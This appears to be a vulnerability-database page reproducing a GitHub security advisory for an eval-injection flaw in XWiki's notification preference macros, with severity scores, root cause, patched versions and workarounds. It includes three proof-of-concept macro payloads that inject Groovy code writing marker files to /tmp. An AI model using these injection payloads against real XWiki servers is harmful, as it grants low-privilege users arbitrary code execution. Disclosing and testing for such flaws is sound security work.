Lucene search

K
githubGitHub Advisory DatabaseGHSA-P9MJ-V5MF-M82X
HistoryApr 12, 2023 - 8:35 p.m.

org.xwiki.platform:xwiki-platform-notifications-ui Eval Injection vulnerability

2023-04-1220:35:13
CWE-94
CWE-95
GitHub Advisory Database
github.com
4
xwiki
platform
notifications
ui
eval
injection
vulnerability
groovy
python
velocity
code
macro
notification filters
exploit
patches
workarounds
reference
jira
security mailing list

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

0.002 Low

EPSS

Percentile

52.9%

Impact

Any user with view rights on commonly accessible documents including the notification preferences macros can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the user parameter of the macro that provide the notification filters. These macros are used in the user profiles and thus installed by default in XWiki.

A proof of concept exploit is

{{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

{{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

{{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

If this creates files inside /tmp, the installation is vulnerable.

Patches

The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10.

Workarounds

The issue can be fixed by patching the code in the affected macros that are contained in XWiki documents as shown in the patch for this issue.

References

For more information

If you have any questions or comments about this advisory:

Affected configurations

Vulners
Node
org.xwiki.platform\xwikiMatchplatform
OR
org.xwiki.platform\xwikiMatchplatform
OR
org.xwiki.platform\xwikiMatchplatform

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

0.002 Low

EPSS

Percentile

52.9%

Related for GHSA-P9MJ-V5MF-M82X